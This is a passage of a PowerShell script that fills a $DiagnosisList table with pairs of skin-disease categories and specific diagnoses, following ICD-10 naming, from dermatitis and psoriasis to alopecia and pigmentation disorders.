$DiagnosisList.Rows.Add("Cellulitis and acute lymphangitis, unspecified","Cellulitis, unspecified") + $null = $DiagnosisList.Rows.Add("Cellulitis and acute lymphangitis, unspecified","Acute lymphangitis, unspecified") + $null = $DiagnosisList.Rows.Add("Acute lymphadenitis","Acute lymphadenitis of face, head and neck") + $null = $DiagnosisList.Rows.Add("Acute lymphadenitis","Acute lymphadenitis of trunk") + $null = $DiagnosisList.Rows.Add("Acute lymphadenitis","Acute lymphadenitis of upper limb") + $null = $DiagnosisList.Rows.Add("Acute lymphadenitis","Acute lymphadenitis of lower limb") + $null = $DiagnosisList.Rows.Add("Acute lymphadenitis","Acute lymphadenitis of other sites") + $null = $DiagnosisList.Rows.Add("Acute lymphadenitis","Acute lymphadenitis, unspecified") + $null = $DiagnosisList.Rows.Add("Pilonidal cyst and sinus with abscess","Pilonidal cyst with abscess") + $null = $DiagnosisList.Rows.Add("Pilonidal cyst and sinus with abscess","Pilonidal sinus with abscess") + $null = $DiagnosisList.Rows.Add("Pilonidal cyst and sinus without abscess","Pilonidal cyst without abscess") + $null = $DiagnosisList.Rows.Add("Pilonidal cyst and sinus without abscess","Pilonidal sinus without abscess") + $null = $DiagnosisList.Rows.Add("Other local infections of skin and subcutaneous tissue","Pyoderma") + $null = $DiagnosisList.Rows.Add("Other local infections of skin and subcutaneous tissue","Erythrasma") + $null = $DiagnosisList.Rows.Add("Other specified local infections of the skin and subcutaneous tissue","Pyoderma vegetans") + $null = $DiagnosisList.Rows.Add("Other specified local infections of the skin and subcutaneous tissue","Omphalitis not of newborn") + $null = $DiagnosisList.Rows.Add("Other specified local infections of the skin and subcutaneous tissue","Other specified local infections of the skin and subcutaneous tissue") + $null = $DiagnosisList.Rows.Add("Local infection of the skin and subcutaneous tissue, unspecified","Local infection of the skin and subcutaneous tissue, unspecified") + $null = $DiagnosisList.Rows.Add("Pemphigus","Pemphigus vulgaris") + $null = $DiagnosisList.Rows.Add("Pemphigus","Pemphigus vegetans") + $null = $DiagnosisList.Rows.Add("Pemphigus","Pemphigus foliaceous") + $null = $DiagnosisList.Rows.Add("Pemphigus","Brazilian pemphigus [fogo selvagem]") + $null = $DiagnosisList.Rows.Add("Pemphigus","Pemphigus erythematosus") + $null = $DiagnosisList.Rows.Add("Pemphigus","Drug-induced pemphigus") + $null = $DiagnosisList.Rows.Add("Other pemphigus","Paraneoplastic pemphigus") + $null = $DiagnosisList.Rows.Add("Other pemphigus","Other pemphigus") + $null = $DiagnosisList.Rows.Add("Pemphigus, unspecified","Pemphigus, unspecified") + $null = $DiagnosisList.Rows.Add("Other acantholytic disorders","Acquired keratosis follicularis") + $null = $DiagnosisList.Rows.Add("Other acantholytic disorders","Transient acantholytic dermatosis [Grover]") + $null = $DiagnosisList.Rows.Add("Other acantholytic disorders","Other specified acantholytic disorders") + $null = $DiagnosisList.Rows.Add("Other acantholytic disorders","Acantholytic disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Pemphigoid","Bullous pemphigoid") + $null = $DiagnosisList.Rows.Add("Pemphigoid","Cicatricial pemphigoid") + $null = $DiagnosisList.Rows.Add("Pemphigoid","Chronic bullous disease of childhood") + $null = $DiagnosisList.Rows.Add("Acquired epidermolysis bullosa","Acquired epidermolysis bullosa, unspecified") + $null = $DiagnosisList.Rows.Add("Acquired epidermolysis bullosa","Epidermolysis bullosa due to drug") + $null = $DiagnosisList.Rows.Add("Acquired epidermolysis bullosa","Other acquired epidermolysis bullosa") + $null = $DiagnosisList.Rows.Add("Other pemphigoid","Other pemphigoid") + $null = $DiagnosisList.Rows.Add("Pemphigoid, unspecified","Pemphigoid, unspecified") + $null = $DiagnosisList.Rows.Add("Other bullous disorders","Dermatitis herpetiformis") + $null = $DiagnosisList.Rows.Add("Other bullous disorders","Subcorneal pustular dermatitis") + $null = $DiagnosisList.Rows.Add("Other bullous disorders","Other specified bullous disorders") + $null = $DiagnosisList.Rows.Add("Other bullous disorders","Bullous disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Bullous disorders in diseases classified elsewhere","Bullous disorders in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Atopic dermatitis","Besnier's prurigo") + $null = $DiagnosisList.Rows.Add("Other atopic dermatitis","Atopic neurodermatitis") + $null = $DiagnosisList.Rows.Add("Other atopic dermatitis","Flexural eczema") + $null = $DiagnosisList.Rows.Add("Other atopic dermatitis","Infantile (acute) (chronic) eczema") + $null = $DiagnosisList.Rows.Add("Other atopic dermatitis","Intrinsic (allergic) eczema") + $null = $DiagnosisList.Rows.Add("Other atopic dermatitis","Other atopic dermatitis") + $null = $DiagnosisList.Rows.Add("Atopic dermatitis, unspecified","Atopic dermatitis, unspecified") + $null = $DiagnosisList.Rows.Add("Seborrheic dermatitis","Seborrhea capitis") + $null = $DiagnosisList.Rows.Add("Seborrheic dermatitis","Seborrheic infantile dermatitis") + $null = $DiagnosisList.Rows.Add("Seborrheic dermatitis","Other seborrheic dermatitis") + $null = $DiagnosisList.Rows.Add("Seborrheic dermatitis","Seborrheic dermatitis, unspecified") + $null = $DiagnosisList.Rows.Add("Diaper dermatitis","Diaper dermatitis") + $null = $DiagnosisList.Rows.Add("Allergic contact dermatitis","Allergic contact dermatitis due to metals") + $null = $DiagnosisList.Rows.Add("Allergic contact dermatitis","Allergic contact dermatitis due to adhesives") + $null = $DiagnosisList.Rows.Add("Allergic contact dermatitis","Allergic contact dermatitis due to cosmetics") + $null = $DiagnosisList.Rows.Add("Allergic contact dermatitis","Allergic contact dermatitis due to drugs in contact with skin") + $null = $DiagnosisList.Rows.Add("Allergic contact dermatitis","Allergic contact dermatitis due to dyes") + $null = $DiagnosisList.Rows.Add("Allergic contact dermatitis","Allergic contact dermatitis due to other chemical products") + $null = $DiagnosisList.Rows.Add("Allergic contact dermatitis","Allergic contact dermatitis due to food in contact with the skin") + $null = $DiagnosisList.Rows.Add("Allergic contact dermatitis","Allergic contact dermatitis due to plants, except food") + $null = $DiagnosisList.Rows.Add("Allergic contact dermatitis due to other agents","Allergic contact dermatitis due to animal (cat) (dog) dander") + $null = $DiagnosisList.Rows.Add("Allergic contact dermatitis due to other agents","Allergic contact dermatitis due to other agents") + $null = $DiagnosisList.Rows.Add("Allergic contact dermatitis, unspecified cause","Allergic contact dermatitis, unspecified cause") + $null = $DiagnosisList.Rows.Add("Irritant contact dermatitis","Irritant contact dermatitis due to detergents") + $null = $DiagnosisList.Rows.Add("Irritant contact dermatitis","Irritant contact dermatitis due to oils and greases") + $null = $DiagnosisList.Rows.Add("Irritant contact dermatitis","Irritant contact dermatitis due to solvents") + $null = $DiagnosisList.Rows.Add("Irritant contact dermatitis","Irritant contact dermatitis due to cosmetics") + $null = $DiagnosisList.Rows.Add("Irritant contact dermatitis","Irritant contact dermatitis due to drugs in contact with skin") + $null = $DiagnosisList.Rows.Add("Irritant contact dermatitis","Irritant contact dermatitis due to other chemical products") + $null = $DiagnosisList.Rows.Add("Irritant contact dermatitis","Irritant contact dermatitis due to food in contact with skin") + $null = $DiagnosisList.Rows.Add("Irritant contact dermatitis","Irritant contact dermatitis due to plants, except food") + $null = $DiagnosisList.Rows.Add("Irritant contact dermatitis due to other agents","Irritant contact dermatitis due to metals") + $null = $DiagnosisList.Rows.Add("Irritant contact dermatitis due to other agents","Irritant contact dermatitis due to other agents") + $null = $DiagnosisList.Rows.Add("Irritant contact dermatitis, unspecified cause","Irritant contact dermatitis, unspecified cause") + $null = $DiagnosisList.Rows.Add("Unspecified contact dermatitis","Unspecified contact dermatitis due to cosmetics") + $null = $DiagnosisList.Rows.Add("Unspecified contact dermatitis","Unspecified contact dermatitis due to drugs in contact with skin") + $null = $DiagnosisList.Rows.Add("Unspecified contact dermatitis","Unspecified contact dermatitis due to dyes") + $null = $DiagnosisList.Rows.Add("Unspecified contact dermatitis","Unspecified contact dermatitis due to other chemical products") + $null = $DiagnosisList.Rows.Add("Unspecified contact dermatitis","Unspecified contact dermatitis due to food in contact with skin") + $null = $DiagnosisList.Rows.Add("Unspecified contact dermatitis","Unspecified contact dermatitis due to plants, except food") + $null = $DiagnosisList.Rows.Add("Unspecified contact dermatitis","Unspecified contact dermatitis due to other agents") + $null = $DiagnosisList.Rows.Add("Unspecified contact dermatitis","Unspecified contact dermatitis, unspecified cause") + $null = $DiagnosisList.Rows.Add("Exfoliative dermatitis","Exfoliative dermatitis") + $null = $DiagnosisList.Rows.Add("Dermatitis due to substances taken internally","Generalized skin eruption due to drugs and medicaments taken internally") + $null = $DiagnosisList.Rows.Add("Dermatitis due to substances taken internally","Localized skin eruption due to drugs and medicaments taken internally") + $null = $DiagnosisList.Rows.Add("Dermatitis due to substances taken internally","Dermatitis due to ingested food") + $null = $DiagnosisList.Rows.Add("Dermatitis due to substances taken internally","Dermatitis due to other substances taken internally") + $null = $DiagnosisList.Rows.Add("Dermatitis due to substances taken internally","Dermatitis due to unspecified substance taken internally") + $null = $DiagnosisList.Rows.Add("Lichen simplex chronicus and prurigo","Lichen simplex chronicus") + $null = $DiagnosisList.Rows.Add("Lichen simplex chronicus and prurigo","Prurigo nodularis") + $null = $DiagnosisList.Rows.Add("Lichen simplex chronicus and prurigo","Other prurigo") + $null = $DiagnosisList.Rows.Add("Pruritus","Pruritus ani") + $null = $DiagnosisList.Rows.Add("Pruritus","Pruritus scroti") + $null = $DiagnosisList.Rows.Add("Pruritus","Pruritus vulvae") + $null = $DiagnosisList.Rows.Add("Pruritus","Anogenital pruritus, unspecified") + $null = $DiagnosisList.Rows.Add("Pruritus","Other pruritus") + $null = $DiagnosisList.Rows.Add("Pruritus","Pruritus, unspecified") + $null = $DiagnosisList.Rows.Add("Other and unspecified dermatitis","Nummular dermatitis") + $null = $DiagnosisList.Rows.Add("Other and unspecified dermatitis","Dyshidrosis [pompholyx]") + $null = $DiagnosisList.Rows.Add("Other and unspecified dermatitis","Cutaneous autosensitization") + $null = $DiagnosisList.Rows.Add("Other and unspecified dermatitis","Infective dermatitis") + $null = $DiagnosisList.Rows.Add("Other and unspecified dermatitis","Erythema intertrigo") + $null = $DiagnosisList.Rows.Add("Other and unspecified dermatitis","Pityriasis alba") + $null = $DiagnosisList.Rows.Add("Other and unspecified dermatitis","Other specified dermatitis") + $null = $DiagnosisList.Rows.Add("Other and unspecified dermatitis","Dermatitis, unspecified") + $null = $DiagnosisList.Rows.Add("Psoriasis","Psoriasis vulgaris") + $null = $DiagnosisList.Rows.Add("Psoriasis","Generalized pustular psoriasis") + $null = $DiagnosisList.Rows.Add("Psoriasis","Acrodermatitis continua") + $null = $DiagnosisList.Rows.Add("Psoriasis","Pustulosis palmaris et plantaris") + $null = $DiagnosisList.Rows.Add("Psoriasis","Guttate psoriasis") + $null = $DiagnosisList.Rows.Add("Arthropathic psoriasis","Arthropathic psoriasis, unspecified") + $null = $DiagnosisList.Rows.Add("Arthropathic psoriasis","Distal interphalangeal psoriatic arthropathy") + $null = $DiagnosisList.Rows.Add("Arthropathic psoriasis","Psoriatic arthritis mutilans") + $null = $DiagnosisList.Rows.Add("Arthropathic psoriasis","Psoriatic spondylitis") + $null = $DiagnosisList.Rows.Add("Arthropathic psoriasis","Psoriatic juvenile arthropathy") + $null = $DiagnosisList.Rows.Add("Arthropathic psoriasis","Other psoriatic arthropathy") + $null = $DiagnosisList.Rows.Add("Other psoriasis","Other psoriasis") + $null = $DiagnosisList.Rows.Add("Psoriasis, unspecified","Psoriasis, unspecified") + $null = $DiagnosisList.Rows.Add("Parapsoriasis","Pityriasis lichenoides et varioliformis acuta") + $null = $DiagnosisList.Rows.Add("Parapsoriasis","Pityriasis lichenoides chronica") + $null = $DiagnosisList.Rows.Add("Parapsoriasis","Small plaque parapsoriasis") + $null = $DiagnosisList.Rows.Add("Parapsoriasis","Large plaque parapsoriasis") + $null = $DiagnosisList.Rows.Add("Parapsoriasis","Retiform parapsoriasis") + $null = $DiagnosisList.Rows.Add("Parapsoriasis","Other parapsoriasis") + $null = $DiagnosisList.Rows.Add("Parapsoriasis","Parapsoriasis, unspecified") + $null = $DiagnosisList.Rows.Add("Pityriasis rosea","Pityriasis rosea") + $null = $DiagnosisList.Rows.Add("Lichen planus","Hypertrophic lichen planus") + $null = $DiagnosisList.Rows.Add("Lichen planus","Bullous lichen planus") + $null = $DiagnosisList.Rows.Add("Lichen planus","Lichenoid drug reaction") + $null = $DiagnosisList.Rows.Add("Lichen planus","Subacute (active) lichen planus") + $null = $DiagnosisList.Rows.Add("Lichen planus","Other lichen planus") + $null = $DiagnosisList.Rows.Add("Lichen planus","Lichen planus, unspecified") + $null = $DiagnosisList.Rows.Add("Other papulosquamous disorders","Pityriasis rubra pilaris") + $null = $DiagnosisList.Rows.Add("Other papulosquamous disorders","Lichen nitidus") + $null = $DiagnosisList.Rows.Add("Other papulosquamous disorders","Lichen striatus") + $null = $DiagnosisList.Rows.Add("Other papulosquamous disorders","Lichen ruber moniliformis") + $null = $DiagnosisList.Rows.Add("Other papulosquamous disorders","Infantile papular acrodermatitis [Gianotti-Crosti]") + $null = $DiagnosisList.Rows.Add("Other papulosquamous disorders","Other specified papulosquamous disorders") + $null = $DiagnosisList.Rows.Add("Other papulosquamous disorders","Papulosquamous disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Papulosquamous disorders in diseases classified elsewhere","Papulosquamous disorders in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Exfoliation due to erythematous conditions according to extent of body surface involved","Exfoliation due to erythematous condition involving less than 10 percent of body surface") + $null = $DiagnosisList.Rows.Add("Exfoliation due to erythematous conditions according to extent of body surface involved","Exfoliation due to erythematous condition involving 10-19 percent of body surface") + $null = $DiagnosisList.Rows.Add("Exfoliation due to erythematous conditions according to extent of body surface involved","Exfoliation due to erythematous condition involving 20-29 percent of body surface") + $null = $DiagnosisList.Rows.Add("Exfoliation due to erythematous conditions according to extent of body surface involved","Exfoliation due to erythematous condition involving 30-39 percent of body surface") + $null = $DiagnosisList.Rows.Add("Exfoliation due to erythematous conditions according to extent of body surface involved","Exfoliation due to erythematous condition involving 40-49 percent of body surface") + $null = $DiagnosisList.Rows.Add("Exfoliation due to erythematous conditions according to extent of body surface involved","Exfoliation due to erythematous condition involving 50-59 percent of body surface") + $null = $DiagnosisList.Rows.Add("Exfoliation due to erythematous conditions according to extent of body surface involved","Exfoliation due to erythematous condition involving 60-69 percent of body surface") + $null = $DiagnosisList.Rows.Add("Exfoliation due to erythematous conditions according to extent of body surface involved","Exfoliation due to erythematous condition involving 70-79 percent of body surface") + $null = $DiagnosisList.Rows.Add("Exfoliation due to erythematous conditions according to extent of body surface involved","Exfoliation due to erythematous condition involving 80-89 percent of body surface") + $null = $DiagnosisList.Rows.Add("Exfoliation due to erythematous conditions according to extent of body surface involved","Exfoliation due to erythematous condition involving 90 or more percent of body surface") + $null = $DiagnosisList.Rows.Add("Urticaria","Allergic urticaria") + $null = $DiagnosisList.Rows.Add("Urticaria","Idiopathic urticaria") + $null = $DiagnosisList.Rows.Add("Urticaria","Urticaria due to cold and heat") + $null = $DiagnosisList.Rows.Add("Urticaria","Dermatographic urticaria") + $null = $DiagnosisList.Rows.Add("Urticaria","Vibratory urticaria") + $null = $DiagnosisList.Rows.Add("Urticaria","Cholinergic urticaria") + $null = $DiagnosisList.Rows.Add("Urticaria","Contact urticaria") + $null = $DiagnosisList.Rows.Add("Urticaria","Other urticaria") + $null = $DiagnosisList.Rows.Add("Urticaria","Urticaria, unspecified") + $null = $DiagnosisList.Rows.Add("Erythema multiforme","Nonbullous erythema multiforme") + $null = $DiagnosisList.Rows.Add("Erythema multiforme","Stevens-Johnson syndrome") + $null = $DiagnosisList.Rows.Add("Erythema multiforme","Toxic epidermal necrolysis [Lyell]") + $null = $DiagnosisList.Rows.Add("Erythema multiforme","Stevens-Johnson syndrome-toxic epidermal necrolysis overlap syndrome") + $null = $DiagnosisList.Rows.Add("Erythema multiforme","Other erythema multiforme") + $null = $DiagnosisList.Rows.Add("Erythema multiforme","Erythema multiforme, unspecified") + $null = $DiagnosisList.Rows.Add("Erythema nodosum","Erythema nodosum") + $null = $DiagnosisList.Rows.Add("Other erythematous conditions","Toxic erythema") + $null = $DiagnosisList.Rows.Add("Other erythematous conditions","Erythema annulare centrifugum") + $null = $DiagnosisList.Rows.Add("Other erythematous conditions","Erythema marginatum") + $null = $DiagnosisList.Rows.Add("Other erythematous conditions","Other chronic figurate erythema") + $null = $DiagnosisList.Rows.Add("Other erythematous conditions","Other specified erythematous conditions") + $null = $DiagnosisList.Rows.Add("Other erythematous conditions","Erythematous condition, unspecified") + $null = $DiagnosisList.Rows.Add("Erythema in diseases classified elsewhere","Erythema in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Sunburn","Sunburn of first degree") + $null = $DiagnosisList.Rows.Add("Sunburn","Sunburn of second degree") + $null = $DiagnosisList.Rows.Add("Sunburn","Sunburn of third degree") + $null = $DiagnosisList.Rows.Add("Sunburn","Sunburn, unspecified") + $null = $DiagnosisList.Rows.Add("Other acute skin changes due to ultraviolet radiation","Drug phototoxic response") + $null = $DiagnosisList.Rows.Add("Other acute skin changes due to ultraviolet radiation","Drug photoallergic response") + $null = $DiagnosisList.Rows.Add("Other acute skin changes due to ultraviolet radiation","Photocontact dermatitis [berloque dermatitis]") + $null = $DiagnosisList.Rows.Add("Other acute skin changes due to ultraviolet radiation","Solar urticaria") + $null = $DiagnosisList.Rows.Add("Other acute skin changes due to ultraviolet radiation","Polymorphous light eruption") + $null = $DiagnosisList.Rows.Add("Other acute skin changes due to ultraviolet radiation","Disseminated superficial actinic porokeratosis (DSAP)") + $null = $DiagnosisList.Rows.Add("Other acute skin changes due to ultraviolet radiation","Other specified acute skin changes due to ultraviolet radiation") + $null = $DiagnosisList.Rows.Add("Other acute skin changes due to ultraviolet radiation","Acute skin change due to ultraviolet radiation, unspecified") + $null = $DiagnosisList.Rows.Add("Skin changes due to chronic exposure to nonionizing radiation","Actinic keratosis") + $null = $DiagnosisList.Rows.Add("Skin changes due to chronic exposure to nonionizing radiation","Actinic reticuloid") + $null = $DiagnosisList.Rows.Add("Skin changes due to chronic exposure to nonionizing radiation","Cutis rhomboidalis nuchae") + $null = $DiagnosisList.Rows.Add("Skin changes due to chronic exposure to nonionizing radiation","Poikiloderma of Civatte") + $null = $DiagnosisList.Rows.Add("Skin changes due to chronic exposure to nonionizing radiation","Cutis laxa senilis") + $null = $DiagnosisList.Rows.Add("Skin changes due to chronic exposure to nonionizing radiation","Actinic granuloma") + $null = $DiagnosisList.Rows.Add("Skin changes due to chronic exposure to nonionizing radiation","Other skin changes due to chronic exposure to nonionizing radiation") + $null = $DiagnosisList.Rows.Add("Skin changes due to chronic exposure to nonionizing radiation","Skin changes due to chronic exposure to nonionizing radiation, unspecified") + $null = $DiagnosisList.Rows.Add("Radiodermatitis","Acute radiodermatitis") + $null = $DiagnosisList.Rows.Add("Radiodermatitis","Chronic radiodermatitis") + $null = $DiagnosisList.Rows.Add("Radiodermatitis","Radiodermatitis, unspecified") + $null = $DiagnosisList.Rows.Add("Other disorders of skin and subcutaneous tissue related to radiation","Erythema ab igne [dermatitis ab igne]") + $null = $DiagnosisList.Rows.Add("Other disorders of skin and subcutaneous tissue related to radiation","Other specified disorders of the skin and subcutaneous tissue related to radiation") + $null = $DiagnosisList.Rows.Add("Other disorders of skin and subcutaneous tissue related to radiation","Disorder of the skin and subcutaneous tissue related to radiation, unspecified") + $null = $DiagnosisList.Rows.Add("Nail disorders","Ingrowing nail") + $null = $DiagnosisList.Rows.Add("Nail disorders","Onycholysis") + $null = $DiagnosisList.Rows.Add("Nail disorders","Onychogryphosis") + $null = $DiagnosisList.Rows.Add("Nail disorders","Nail dystrophy") + $null = $DiagnosisList.Rows.Add("Nail disorders","Beau's lines") + $null = $DiagnosisList.Rows.Add("Nail disorders","Yellow nail syndrome") + $null = $DiagnosisList.Rows.Add("Nail disorders","Other nail disorders") + $null = $DiagnosisList.Rows.Add("Nail disorders","Nail disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Nail disorders in diseases classified elsewhere","Nail disorders in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Alopecia areata","Alopecia (capitis) totalis") + $null = $DiagnosisList.Rows.Add("Alopecia areata","Alopecia universalis") + $null = $DiagnosisList.Rows.Add("Alopecia areata","Ophiasis") + $null = $DiagnosisList.Rows.Add("Alopecia areata","Other alopecia areata") + $null = $DiagnosisList.Rows.Add("Alopecia areata","Alopecia areata, unspecified") + $null = $DiagnosisList.Rows.Add("Androgenic alopecia","Drug-induced androgenic alopecia") + $null = $DiagnosisList.Rows.Add("Androgenic alopecia","Other androgenic alopecia") + $null = $DiagnosisList.Rows.Add("Androgenic alopecia","Androgenic alopecia, unspecified") + $null = $DiagnosisList.Rows.Add("Other nonscarring hair loss","Telogen effluvium") + $null = $DiagnosisList.Rows.Add("Other nonscarring hair loss","Anagen effluvium") + $null = $DiagnosisList.Rows.Add("Other nonscarring hair loss","Alopecia mucinosa") + $null = $DiagnosisList.Rows.Add("Other nonscarring hair loss","Other specified nonscarring hair loss") + $null = $DiagnosisList.Rows.Add("Other nonscarring hair loss","Nonscarring hair loss, unspecified") + $null = $DiagnosisList.Rows.Add("Cicatricial alopecia [scarring hair loss]","Pseudopelade") + $null = $DiagnosisList.Rows.Add("Cicatricial alopecia [scarring hair loss]","Lichen planopilaris") + $null = $DiagnosisList.Rows.Add("Cicatricial alopecia [scarring hair loss]","Folliculitis decalvans") + $null = $DiagnosisList.Rows.Add("Cicatricial alopecia [scarring hair loss]","Perifolliculitis capitis abscedens") + $null = $DiagnosisList.Rows.Add("Cicatricial alopecia [scarring hair loss]","Folliculitis ulerythematosa reticulata") + $null = $DiagnosisList.Rows.Add("Cicatricial alopecia [scarring hair loss]","Other cicatricial alopecia") + $null = $DiagnosisList.Rows.Add("Cicatricial alopecia [scarring hair loss]","Cicatricial alopecia, unspecified") + $null = $DiagnosisList.Rows.Add("Hair color and hair shaft abnormalities","Trichorrhexis nodosa") + $null = $DiagnosisList.Rows.Add("Hair color and hair shaft abnormalities","Variations in hair color") + $null = $DiagnosisList.Rows.Add("Hair color and hair shaft abnormalities","Other hair color and hair shaft abnormalities") + $null = $DiagnosisList.Rows.Add("Hair color and hair shaft abnormalities","Hair color and hair shaft abnormality, unspecified") + $null = $DiagnosisList.Rows.Add("Hypertrichosis","Hirsutism") + $null = $DiagnosisList.Rows.Add("Hypertrichosis","Acquired hypertrichosis lanuginosa") + $null = $DiagnosisList.Rows.Add("Hypertrichosis","Localized hypertrichosis") + $null = $DiagnosisList.Rows.Add("Hypertrichosis","Polytrichia") + $null = $DiagnosisList.Rows.Add("Hypertrichosis","Other hypertrichosis") + $null = $DiagnosisList.Rows.Add("Hypertrichosis","Hypertrichosis, unspecified") + $null = $DiagnosisList.Rows.Add("Acne","Acne vulgaris") + $null = $DiagnosisList.Rows.Add("Acne","Acne conglobata") + $null = $DiagnosisList.Rows.Add("Acne","Acne varioliformis") + $null = $DiagnosisList.Rows.Add("Acne","Acne tropica") + $null = $DiagnosisList.Rows.Add("Acne","Infantile acne") + $null = $DiagnosisList.Rows.Add("Acne","Acne excoriee") + $null = $DiagnosisList.Rows.Add("Acne","Other acne") + $null = $DiagnosisList.Rows.Add("Acne","Acne, unspecified") + $null = $DiagnosisList.Rows.Add("Rosacea","Perioral dermatitis") + $null = $DiagnosisList.Rows.Add("Rosacea","Rhinophyma") + $null = $DiagnosisList.Rows.Add("Rosacea","Other rosacea") + $null = $DiagnosisList.Rows.Add("Rosacea","Rosacea, unspecified") + $null = $DiagnosisList.Rows.Add("Follicular cysts of skin and subcutaneous tissue","Epidermal cyst") + $null = $DiagnosisList.Rows.Add("Pilar and trichodermal cyst","Pilar cyst") + $null = $DiagnosisList.Rows.Add("Pilar and trichodermal cyst","Trichodermal cyst") + $null = $DiagnosisList.Rows.Add("Steatocystoma multiplex","Steatocystoma multiplex") + $null = $DiagnosisList.Rows.Add("Sebaceous cyst","Sebaceous cyst") + $null = $DiagnosisList.Rows.Add("Other follicular cysts of the skin and subcutaneous tissue","Other follicular cysts of the skin and subcutaneous tissue") + $null = $DiagnosisList.Rows.Add("Follicular cyst of the skin and subcutaneous tissue, unspecified","Follicular cyst of the skin and subcutaneous tissue, unspecified") + $null = $DiagnosisList.Rows.Add("Other follicular disorders","Acne keloid") + $null = $DiagnosisList.Rows.Add("Other follicular disorders","Pseudofolliculitis barbae") + $null = $DiagnosisList.Rows.Add("Other follicular disorders","Hidradenitis suppurativa") + $null = $DiagnosisList.Rows.Add("Other follicular disorders","Other specified follicular disorders") + $null = $DiagnosisList.Rows.Add("Other follicular disorders","Follicular disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Eccrine sweat disorders","Miliaria rubra") + $null = $DiagnosisList.Rows.Add("Eccrine sweat disorders","Miliaria crystallina") + $null = $DiagnosisList.Rows.Add("Eccrine sweat disorders","Miliaria profunda") + $null = $DiagnosisList.Rows.Add("Eccrine sweat disorders","Miliaria, unspecified") + $null = $DiagnosisList.Rows.Add("Eccrine sweat disorders","Anhidrosis") + $null = $DiagnosisList.Rows.Add("Primary focal hyperhidrosis","Primary focal hyperhidrosis, axilla") + $null = $DiagnosisList.Rows.Add("Primary focal hyperhidrosis","Primary focal hyperhidrosis, face") + $null = $DiagnosisList.Rows.Add("Primary focal hyperhidrosis","Primary focal hyperhidrosis, palms") + $null = $DiagnosisList.Rows.Add("Primary focal hyperhidrosis","Primary focal hyperhidrosis, soles") + $null = $DiagnosisList.Rows.Add("Primary focal hyperhidrosis","Primary focal hyperhidrosis, unspecified") + $null = $DiagnosisList.Rows.Add("Secondary focal hyperhidrosis","Secondary focal hyperhidrosis") + $null = $DiagnosisList.Rows.Add("Other eccrine sweat disorders","Other eccrine sweat disorders") + $null = $DiagnosisList.Rows.Add("Eccrine sweat disorder, unspecified","Eccrine sweat disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Apocrine sweat disorders","Bromhidrosis") + $null = $DiagnosisList.Rows.Add("Apocrine sweat disorders","Chromhidrosis") + $null = $DiagnosisList.Rows.Add("Apocrine sweat disorders","Apocrine miliaria") + $null = $DiagnosisList.Rows.Add("Apocrine sweat disorders","Other apocrine sweat disorders") + $null = $DiagnosisList.Rows.Add("Apocrine sweat disorders","Apocrine sweat disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Intraoperative hemorrhage and hematoma of skin and subcutaneous tissue complicating a procedure","Intraoperative hemorrhage and hematoma of skin and subcutaneous tissue complicating a dermatologic procedure") + $null = $DiagnosisList.Rows.Add("Intraoperative hemorrhage and hematoma of skin and subcutaneous tissue complicating a procedure","Intraoperative hemorrhage and hematoma of skin and subcutaneous tissue complicating other procedure") + $null = $DiagnosisList.Rows.Add("Accidental puncture and laceration of skin and subcutaneous tissue during a procedure","Accidental puncture and laceration of skin and subcutaneous tissue during a dermatologic procedure") + $null = $DiagnosisList.Rows.Add("Accidental puncture and laceration of skin and subcutaneous tissue during a procedure","Accidental puncture and laceration of skin and subcutaneous tissue during other procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hemorrhage of skin and subcutaneous tissue following a procedure","Postprocedural hemorrhage of skin and subcutaneous tissue following a dermatologic procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hemorrhage of skin and subcutaneous tissue following a procedure","Postprocedural hemorrhage of skin and subcutaneous tissue following other procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma and seroma of skin and subcutaneous tissue following a procedure","Postprocedural hematoma of skin and subcutaneous tissue following a dermatologic procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma and seroma of skin and subcutaneous tissue following a procedure","Postprocedural hematoma of skin and subcutaneous tissue following other procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma and seroma of skin and subcutaneous tissue following a procedure","Postprocedural seroma of skin and subcutaneous tissue following a dermatologic procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma and seroma of skin and subcutaneous tissue following a procedure","Postprocedural seroma of skin and subcutaneous tissue following other procedure") + $null = $DiagnosisList.Rows.Add("Other intraoperative and postprocedural complications of skin and subcutaneous tissue","Other intraoperative complications of skin and subcutaneous tissue") + $null = $DiagnosisList.Rows.Add("Other intraoperative and postprocedural complications of skin and subcutaneous tissue","Other postprocedural complications of skin and subcutaneous tissue") + $null = $DiagnosisList.Rows.Add("Vitiligo","Vitiligo") + $null = $DiagnosisList.Rows.Add("Other disorders of pigmentation","Postinflammatory hyperpigmentation") + $null = $DiagnosisList.Rows.Add("Other disorders of pigmentation","Chloasma") + $null = $DiagnosisList.Rows.Add("Other disorders of pigmentation","Freckles") + $null = $DiagnosisList.Rows.Add("Other disorders of pigmentation","Cafe au lait spots") + $null = $DiagnosisList.Rows.Add("Other disorders of pigmentation","Other melanin hyperpigmentation") + $null = $DiagnosisList.Rows.Add("Other disorders of pigmentation","Leukoderma, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other disorders of pigmentation","Other disorders of diminished melanin formation") + $null = $DiagnosisList.Rows.Add("Other disorders of pigmentation","Pigmented purpuric dermatosis") + $null = $DiagnosisList.Rows.Add("Other disorders of pigmentation","Other specified disorders of pigmentation") + $null = $DiagnosisList.Rows.Add("Other disorders of pigmentation","Disorder of pigmentation, unspecified") + $null = $DiagnosisList.Rows.Add("Seborrheic keratosis","Inflamed seborrheic keratosis") + $null = $DiagnosisList.Rows.Add("Seborrheic keratosis","Other seborrheic keratosis") + $null = $DiagnosisList.Rows.Add("Acanthosis nigricans","Acanthosis nigricans") + $null = $DiagnosisList.Rows.Add("Corns and callosities","Corns and callosities") + $null = $DiagnosisList.Rows.Add("Other epidermal thickening","Acquired ichthyosis") + $null = 